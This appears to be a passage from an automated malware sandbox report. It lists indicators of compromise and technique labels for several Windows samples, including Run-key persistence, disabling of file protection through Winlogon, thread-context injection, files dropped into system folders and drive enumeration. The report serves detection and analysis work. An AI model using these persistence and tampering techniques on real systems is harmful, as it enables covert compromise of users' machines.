\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\e542afb4-8aea-487a-8254-0c50560ecd16\\selfaware.exe\" --AutoStart" selfaware.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cmd.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\a: zyrnalmo.exe File opened (read-only) \??\o: dxwbwewlne.exe File opened (read-only) \??\l: zyrnalmo.exe File opened (read-only) \??\e: zyrnalmo.exe File opened (read-only) \??\i: zyrnalmo.exe File opened (read-only) \??\j: zyrnalmo.exe File opened (read-only) \??\k: zyrnalmo.exe File opened (read-only) \??\u: zyrnalmo.exe File opened (read-only) \??\q: dxwbwewlne.exe File opened (read-only) \??\s: zyrnalmo.exe File opened (read-only) \??\k: dxwbwewlne.exe File opened (read-only) \??\z: dxwbwewlne.exe File opened (read-only) \??\b: zyrnalmo.exe File opened (read-only) \??\y: zyrnalmo.exe File opened (read-only) \??\v: zyrnalmo.exe File opened (read-only) \??\i: zyrnalmo.exe File opened (read-only) \??\k: zyrnalmo.exe File opened (read-only) \??\r: zyrnalmo.exe File opened (read-only) \??\h: dxwbwewlne.exe File opened (read-only) \??\i: dxwbwewlne.exe File opened (read-only) \??\p: dxwbwewlne.exe File opened (read-only) \??\w: dxwbwewlne.exe File opened (read-only) \??\h: zyrnalmo.exe File opened (read-only) \??\t: zyrnalmo.exe File opened (read-only) \??\b: dxwbwewlne.exe File opened (read-only) \??\a: zyrnalmo.exe File opened (read-only) \??\h: zyrnalmo.exe File opened (read-only) \??\m: zyrnalmo.exe File opened (read-only) \??\u: zyrnalmo.exe File opened (read-only) \??\g: zyrnalmo.exe File opened (read-only) \??\j: zyrnalmo.exe File opened (read-only) \??\p: zyrnalmo.exe File opened (read-only) \??\a: dxwbwewlne.exe File opened (read-only) \??\o: zyrnalmo.exe File opened (read-only) \??\r: zyrnalmo.exe File opened (read-only) \??\l: zyrnalmo.exe File opened (read-only) \??\t: dxwbwewlne.exe File opened (read-only) \??\u: dxwbwewlne.exe File opened (read-only) \??\x: zyrnalmo.exe File opened (read-only) \??\b: zyrnalmo.exe File opened (read-only) \??\g: zyrnalmo.exe File opened (read-only) \??\v: zyrnalmo.exe File opened (read-only) \??\y: zyrnalmo.exe File opened (read-only) \??\n: dxwbwewlne.exe File opened (read-only) \??\s: zyrnalmo.exe File opened (read-only) \??\z: zyrnalmo.exe File opened (read-only) \??\o: zyrnalmo.exe File opened (read-only) \??\z: zyrnalmo.exe File opened (read-only) \??\g: dxwbwewlne.exe File opened (read-only) \??\w: zyrnalmo.exe File opened (read-only) \??\q: zyrnalmo.exe File opened (read-only) \??\w: zyrnalmo.exe File opened (read-only) \??\x: zyrnalmo.exe File opened (read-only) \??\e: dxwbwewlne.exe File opened (read-only) \??\s: dxwbwewlne.exe File opened (read-only) \??\p: zyrnalmo.exe File opened (read-only) \??\q: zyrnalmo.exe File opened (read-only) \??\e: zyrnalmo.exe File opened (read-only) \??\n: zyrnalmo.exe File opened (read-only) \??\j: dxwbwewlne.exe File opened (read-only) \??\l: dxwbwewlne.exe File opened (read-only) \??\v: dxwbwewlne.exe File opened (read-only) \??\m: zyrnalmo.exe File opened (read-only) \??\m: dxwbwewlne.exe -
Modifies WinLogon 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCScan = "0" dxwbwewlne.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCDisable = "4294967197" dxwbwewlne.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
-
AutoIT Executable 4 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0005000000019cad-107.dat autoit_exe behavioral1/files/0x0005000000019a62-192.dat autoit_exe behavioral1/files/0x000500000001a09a-202.dat autoit_exe behavioral1/files/0x000400000001da3a-6452.dat autoit_exe -
Drops file in System32 directory 29 IoCs
description ioc Process File opened for modification C:\Windows\System32\DriverStore\infpub.dat insdrv.exe File opened for modification C:\Windows\SysWOW64\eususxtzrybfydh.exe jaffa.exe File opened for modification C:\Windows\SysWOW64\zyrnalmo.exe jaffa.exe File created C:\Windows\SysWOW64\yjpiisywuzrev.exe jaffa.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{69221814-16d5-1d46-51fb-ed5008d68c70}\SETD461.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\droidcam.inf_amd64_neutral_d98d50465b5eb493\droidcam.PNF DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\infpub.dat DrvInst.exe File created C:\Windows\SysWOW64\zyrnalmo.exe jaffa.exe File created C:\Windows\System32\DriverStore\Temp\{69221814-16d5-1d46-51fb-ed5008d68c70}\SETD45F.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\INFCACHE.0 DrvInst.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt insdrv.exe File opened for modification C:\Windows\SysWOW64\dxwbwewlne.exe jaffa.exe File opened for modification C:\Windows\System32\DriverStore\infstrng.dat DrvInst.exe File opened for modification C:\Windows\SysWOW64\msvbvm60.dll dxwbwewlne.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{69221814-16d5-1d46-51fb-ed5008d68c70}\droidcam.cat DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{69221814-16d5-1d46-51fb-ed5008d68c70}\droidcam.inf DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{69221814-16d5-1d46-51fb-ed5008d68c70}\SETD461.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{69221814-16d5-1d46-51fb-ed5008d68c70}\droidcam.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\infstrng.dat DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\infstrng.dat insdrv.exe File created C:\Windows\SysWOW64\dxwbwewlne.exe jaffa.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{69221814-16d5-1d46-51fb-ed5008d68c70}\SETD45F.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{69221814-16d5-1d46-51fb-ed5008d68c70}\SETD460.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\infpub.dat DrvInst.exe File created C:\Windows\SysWOW64\eususxtzrybfydh.exe jaffa.exe File created C:\Windows\System32\DriverStore\Temp\{69221814-16d5-1d46-51fb-ed5008d68c70}\SETD460.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\infstor.dat DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\droidcam.inf_amd64_neutral_d98d50465b5eb493\droidcam.PNF DrvInst.exe File opened for modification C:\Windows\SysWOW64\yjpiisywuzrev.exe jaffa.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 2992 tasklist.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Control Panel\Desktop\WallPaper = "C:\\Users\\%username%\\Desktop\\t\\a\\bg.png" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Control Panel\Desktop\Wallpaper = "c:\\temp\\bg.bmp" CLWCP.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1608 set thread context of 3304 1608 selfaware.exe 263 PID 988 set thread context of 3636 988 sjhkhda.exe 264 PID 292 set thread context of 1340 292 selfaware.exe 274 -
resource yara_rule behavioral1/files/0x0005000000019d7b-197.dat upx behavioral1/files/0x000500000001a4d4-229.dat upx behavioral1/memory/2704-3549-0x0000000000DF0000-0x0000000002417000-memory.dmp upx behavioral1/memory/2704-4386-0x0000000000DF0000-0x0000000002417000-memory.dmp upx behavioral1/memory/2348-5806-0x0000000005A70000-0x0000000005EAE000-memory.dmp upx behavioral1/memory/1736-5807-0x0000000000400000-0x000000000083E000-memory.dmp upx behavioral1/memory/1736-6034-0x0000000000400000-0x000000000083E000-memory.dmp upx behavioral1/memory/3636-6501-0x0000000000400000-0x0000000000541000-memory.dmp upx -
Drops file in Program Files directory 62 IoCs
description ioc Process File opened for modification C:\Program Files\Winaero Tweaker\Elevator.exe WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker.exe WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-ABNTQ.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files (x86)\DroidCam\lib\DroidCamFilter32.ax 1.exe File created C:\Program Files (x86)\DroidCam\loading.gif 1.exe File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweakerHelper.exe WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-EOIOP.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files (x86)\DroidCam\plist.dll 1.exe File created C:\Program Files (x86)\DroidCam\lib\insdrv.exe 1.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.DOC.exe zyrnalmo.exe File created C:\Program Files (x86)\DroidCam\lib\droidcam.sys 1.exe File opened for modification C:\Program Files (x86)\DroidCam\lib\droidcam.inf 1.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.nal zyrnalmo.exe File created C:\Program Files (x86)\DroidCam\libwinpthread-1.dll 1.exe File created \??\c:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC.exe zyrnalmo.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.nal zyrnalmo.exe File created C:\Program Files\Winaero Tweaker\is-II6G2.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-4MG6P.tmp WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files (x86)\DroidCam\lib\droidcam.sys 1.exe File created C:\Program Files (x86)\DroidCam\avcodec-58.dll 1.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC.exe zyrnalmo.exe File created C:\Program Files\Winaero Tweaker\unins000.dat WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-VMMPS.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files (x86)\DroidCam\adb\adb.exe 1.exe File created C:\Program Files (x86)\DroidCam\swscale-5.dll 1.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.nal zyrnalmo.exe File opened for modification C:\Program Files\Winaero Tweaker\WinaeroControls.dll WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-86OO4.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-NNCP3.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files (x86)\DroidCam\With Stats.lnk 1.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.DOC.exe zyrnalmo.exe File created C:\Program Files\Winaero Tweaker\is-LC10P.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files (x86)\DroidCam\adb\AdbWinApi.dll 1.exe File created C:\Program Files (x86)\DroidCam\adb\AdbWinUsbApi.dll 1.exe File created C:\Program Files (x86)\DroidCam\Uninstall.exe 1.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.DOC.exe zyrnalmo.exe File opened for modification C:\Program Files\Winaero Tweaker\unins000.dat WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files (x86)\DroidCam\usbmuxd.dll 1.exe File created C:\Program Files (x86)\DroidCam\lib\droidcam.cat 1.exe File opened for modification C:\Program Files\SubDir\Romilyaa.exe scary.exe File created C:\Program Files (x86)\DroidCam\lib\DroidCamFilter64.ax 1.exe File created C:\Program Files (x86)\DroidCam\lib\install.bat 1.exe File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker_x86_64.dll WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker_i386.dll WinaeroTweaker-1.40.0.0-setup.tmp File created \??\c:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC.exe zyrnalmo.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC.exe zyrnalmo.exe File created C:\Program Files (x86)\DroidCam\Licence.txt 1.exe File created C:\Program Files (x86)\DroidCam\vc_redist.x86.exe 1.exe File created C:\Program Files (x86)\DroidCam\Toggle HD Mode.lnk 1.exe File created C:\Program Files\Winaero Tweaker\is-6BGC5.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files (x86)\DroidCam\lib\droidcam.inf 1.exe File opened for modification C:\Program Files (x86)\DroidCam\lib\droidcam.cat 1.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.DOC.exe zyrnalmo.exe File created C:\Program Files\SubDir\Romilyaa.exe scary.exe File created C:\Program Files (x86)\DroidCam\DroidCamApp.exe 1.exe File opened for modification C:\Program Files (x86)\DroidCam\vc_redist.x86.exe 1.exe File created C:\Program Files (x86)\DroidCam\avutil-56.dll 1.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC.exe zyrnalmo.exe File created \??\c:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.DOC.exe zyrnalmo.exe File created C:\Program Files\Winaero Tweaker\is-3QPIK.tmp WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification \??\c:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC.exe zyrnalmo.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.nal zyrnalmo.exe -
Drops file in Windows directory 16 IoCs
description ioc Process File opened for modification C:\Windows\INF\setupapi.dev.log insdrv.exe File opened for modification C:\Windows\INF\setupapi.ev1 DrvInst.exe File opened for modification C:\Windows\setuperr.log DrvInst.exe File created C:\Windows\INF\oem2.PNF DrvInst.exe File opened for modification C:\Windows\INF\setupapi.ev2 DrvInst.exe File opened for modification C:\Windows\setupact.log DrvInst.exe File opened for modification C:\Windows\mydoc.rtf jaffa.exe File opened for modification C:\Windows\INF\setupapi.app.log insdrv.exe File created C:\Windows\INF\oem2.inf DrvInst.exe File opened for modification C:\Windows\INF\setupapi.ev3 DrvInst.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File created C:\Windows\~$mydoc.rtf WINWORD.EXE File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\INF\oem2.inf DrvInst.exe File opened for modification C:\Windows\mydoc.rtf WINWORD.EXE File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wim.dll Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f3cb220f1aaa32ca310586e5f62dcab1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sjhkhda.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zyrnalmo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language selfaware.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cipher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language notepad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language freebobux.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ac3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language selfaware.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language yjpiisywuzrev.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cipher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vir.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vc_redist.x86.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cipher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CLWCP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zyrnalmo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WinaeroTweaker-1.40.0.0-setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language psiphon-tunnel-core.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cipher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NOTEPAD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sjhkhda.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regmess.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dxwbwewlne.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 17 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3844 PING.EXE 3240 PING.EXE 3488 PING.EXE 1520 PING.EXE 940 PING.EXE 1776 PING.EXE 2764 PING.EXE 1840 PING.EXE 3348 PING.EXE 400 PING.EXE 1492 PING.EXE 2220 PING.EXE 3196 PING.EXE 2276 PING.EXE 2072 PING.EXE 2688 PING.EXE 4080 PING.EXE -
NSIS installer 4 IoCs
resource yara_rule behavioral1/files/0x000500000001a4d0-227.dat nsis_installer_1 behavioral1/files/0x000500000001a4d0-227.dat nsis_installer_2 behavioral1/files/0x000500000001d8dd-5097.dat nsis_installer_1 behavioral1/files/0x000500000001d8dd-5097.dat nsis_installer_2 -
Office loads VBA resources, possible macro or embedded object present
-
Delays execution with timeout.exe 4 IoCs
pid Process 1776 timeout.exe 988 timeout.exe 3524 timeout.exe 1608 timeout.exe -
Enumerates system info in registry 2 TTPs 13 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 1248 ipconfig.exe -
Kills process with taskkill 7 IoCs
pid Process 3844 taskkill.exe 2400 taskkill.exe 2072 taskkill.exe 2276 taskkill.exe 2236 taskkill.exe 1516 taskkill.exe 1864 taskkill.exe -
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\International\Scripts\10\IEPropFontName = "Kokila" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\International\Scripts\24\IEFixedFontName = "MS Gothic" reg.exe Set value (data) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000061258a869a27634b9cf435dd4c555d3700000000020000000000106600000001000020000000636d3326e519766ed61b7697cbb7bc5026a9e7f4d395bb694a9d5057be5d85f7000000000e8000000002000020000000741b6e75c0631019d53393cc8a7ff0ba686dc879ae77a47a67a7da81138252f3900000004fcd70971289e4bb58eb68d9bf6491fdaca6a83849d83fad2e08e410440d6eaf6cb57bf1af5c59deb536bfc2f4450d82010ec077e78623e1a3fb1983069d23ce0e72a04c29213b93bb88f7e800e61bf5758008bfca1f61c14a02d3c344dab0341806066673d1946c6db74b5e15f9019e1f4cfad72ad642fe0063fa442e6b0db5ca895b6861bd2ff34acc7bbd9e6596dd40000000a0c22bbb711315a519e18b67a1c3b4d1d004889d4febf10728bf0a20eaa097e11d14289eb0d5ad6d56a3c02a155eb22e1972e4f9113770896388201378bf1c59 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\International\Scripts\14\IEPropFontName = "Kalinga" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\DOMStorage\httpsproxy.net\Total = "124" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\DOMStorage\youtube.com\Total = "282" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\International\Scripts\20\IEPropFontName = "Leelawadee UI" reg.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\20 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\International\Scripts\30\IEPropFontName = "Microsoft Yi Baiti" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\International\Scripts\34\IEFixedFontName = "Iskoola Pota" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\International\Scripts\4\IEFixedFontName = "Courier New" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\International\Scripts\15\IEFixedFontName = "Vijaya" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\International\Scripts\6\IEPropFontName = "Times New Roman" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\DOMStorage\https-login--microsoftonline--com.httpsproxy.net\ = "124" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "121" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet 